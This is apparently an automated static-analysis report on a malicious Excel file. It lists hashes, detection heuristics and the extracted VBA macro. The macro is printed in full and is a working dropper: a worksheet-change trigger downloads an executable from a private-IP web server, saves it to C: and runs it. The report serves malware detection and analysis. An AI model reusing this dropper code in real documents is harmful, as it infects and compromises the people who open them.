Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 bf48cbd23f0a7564…

MALICIOUS

Office (OLE) / .XLS

37.0 KB Created: 2017-08-18 09:24:38 Authoring application: Microsoft Excel First seen: 2026-06-06
MD5: 1a1fdf8acbd109b87c7ab37b326e3990 SHA-1: eefb92f76ea41bc6c6102d0df03074859015387c SHA-256: bf48cbd23f0a7564611aa1ff8cf27400e16f97f97320265ee015e8a9f0ce2979
242 Risk Score

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell (exefile)
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        myURL = WinHttpReq.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://10.0.234.205:8000/notepad.exe Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1451 bytes
SHA-256: df594e3080b38e934944341058a0d46182e9739ac244dac447ade7db33e29b20
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub test_macro()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Change(ByVal Target As Range)

If InStr(Range("A1"), "woot") Then

    Dim myURL As String
    myURL = "http://10.0.234.205:8000/notepad.exe"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", myURL, False
    WinHttpReq.Send

    myURL = WinHttpReq.ResponseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile ("C:\notepad.exe")
        oStream.Close
        exefile = "c:\notepad.exe"
        Shell (exefile)
    End If

End If


End Sub

Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.